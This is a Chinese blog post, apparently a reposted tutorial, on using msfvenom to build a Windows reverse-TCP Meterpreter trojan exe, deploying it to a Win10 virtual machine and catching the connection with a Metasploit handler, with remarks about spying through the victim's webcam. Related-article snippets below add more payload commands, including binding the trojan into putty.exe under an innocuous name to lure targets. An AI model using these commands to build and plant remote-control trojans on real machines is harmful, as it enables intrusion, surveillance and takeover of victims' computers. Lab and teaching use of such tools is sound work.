msfvenom生成木马的简单利用

最新推荐文章于 2024-05-11 11:31:04 发布
最新推荐文章于 2024-05-11 11:31:04 发布
阅读量4.6k 收藏 32
点赞数 2
分类专栏: Kali
原文链接:https://blog.csdn.net/xj28555/article/details/107906261
版权

1、简介
本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。

2、实验环境
1、一台kali虚拟机  ip为192.168.110.140

2、一台win10虚拟机

3、实验步骤
1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport=4444 -f exe >shell.exe


2、把刚刚生成的exe木马文件传输到我们的win10靶机上

3、在kali上输入msfconsole打开metasploit

4、metasploit配置及监听

use exploit/multi/handler  #加载模块
 
set payload windows/meterpreter/reverse_tcp  #修改成我们之前生成木马时使用的payload
 
set lhost 192.168.110.140  #设置kali的IP地址为监听地址
 
set lport 4444  #设置监听端口


以上配置全部配置完成后我们就可以输入run然后开始监听了

 

监听好后我们就可以用win10靶机点击我们的木马程序

点击后就连接上我们的kali攻击机了

 

之后我们就可以利用metetpreter这个后渗透模块干一些骚操作了

如用webcam打开摄像头等!
 

dodod2012
关注
  • 2
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3543
msfvenom的使用
Msfvenom使用指南
m0_57221101的博客
02-08 6043
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom的介绍以及基本使用
H_zcn的博客
10-22 1114
metasploit是一个非常强大的攻击,它不仅仅是能对windows系统进行攻击,还支持全平台的攻击,例如Linux,macOS,安卓手机等等,在上一篇metasploit框架介绍中我们简单的了解了metasploit里一些基本框架与命令,以及还体验了最基本的攻击流程,接下来我将进一步的介绍metasploit另外的一些功能与使用方法。msfvenom 有病毒,毒液的意思,它有来生成后门的功能。msfvenom是msfpayload(攻击载荷)和msfencode(编码加密)的组合。
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
msfvenom介绍
最新发布
weixin_46483815的博客
05-11 1775
主要介绍msfvenom 和一些实验
MSF生成木马木马简单使用
爱喝水的仙人树的博客
11-03 8598
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
msfvenom 基本使用
blackguest07的博客
03-05 1437
msfvenom 基础命令
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
68-68.渗透测试-生成木马获取shell(Windows).mp4
05-10
68-68.渗透测试-生成木马获取shell(Windows).mp4
漏洞的利用木马.pdf
04-18
漏洞的利用木马:缓冲区溢出漏洞利用,数据库漏洞利用(MySQL)......
木马与病毒
03-26
木马与病毒的定义、区别和防范方法 在计算机安全领域中,木马和病毒都是常见的恶意代码,但它们之间有着明显的区别...定时进行木马与病毒的预防与查杀,合理利用杀毒软件与木马专杀工具,都是保障电脑安全的重要步骤。
kali学习4——使用msfvenom制作exe木马
不会心跳的博客
01-29 5442
使用msfvenom制作exe木马文件 1. msfvenom msfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木马的思路是,木马在目标机上执行后,向本机发送信息,而本机则需要开启监听状态,收到信息后则进行连接。 2. 制作木马 msfvenom制作木马需要的参数很多: root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement
msfvenom常见的使用命令
路baby的博客
06-24 2622
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线...
利用msfvenom制作绑定攻击代码的木马程序
m0_43406494的博客
11-13 1009
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exe o参数指定输出文件名,这里使用payload.exe,一般会改成一些人畜无害的文件名 -x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。绑定程序自定义,只要能引诱到目标运行它,这里随便选用putty.exe 选用payload use expl
msfvenom简单使用
jeff_true的博客
01-14 619
1,msfvenom -l | grep windows | grep x64 | grep tcp 2,msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.91.10 LPORT=4444 -f exe > shell.exe 将此exe文件传到目标靶机上(windows x64) 3,msfconsole use exploit/...
msf-Msfvenonm生成Linux后门木马实验
渗透、攻防、CTF、编程
10-12 9637
msf-meterpreter生成Linux后门木马实验 0x01 知识点 MSF工具的利用,msf生成Linux木马后门 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.131) 攻击机kaili linux 2020 (ip:192.168.233.129) 0x03 实验过程 1、生成Linux后门 131机器打开kali msfconsole 输入 msfvenom -p linux/x64/meterpreter/reve..
msfconsole的简单使用
m0_53603468的博客
12-30 8539
文章目录前言一、入侵步骤二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的漏洞库和利用代码。msfconsole 是整个框架中最受欢迎的模块,个人感觉也是功能强大的模块,所有的功能都可以该模块下运行。msfweb 是Metasploit framew.
msfvenom 生成windows的exe木马
06-02
生成Windows的exe木马,可以使用msfvenom命令,如下所示: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > payload.exe ``` 其中,`windows/meterpreter/reverse_tcp`是使用Meterpreter反向TCP连接的payload。`LHOST`是攻击者的IP地址,`LPORT`是攻击者监听的端口号。`-f exe`指定输出为exe文件,`> payload.exe`将输出重定向到一个名为payload.exe的文件中。 在生成的exe文件中包含了一个Meterpreter shell,可以用于远程控制目标系统。请注意,使用这种工具进行攻击是非法的,仅用于测试和教育目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值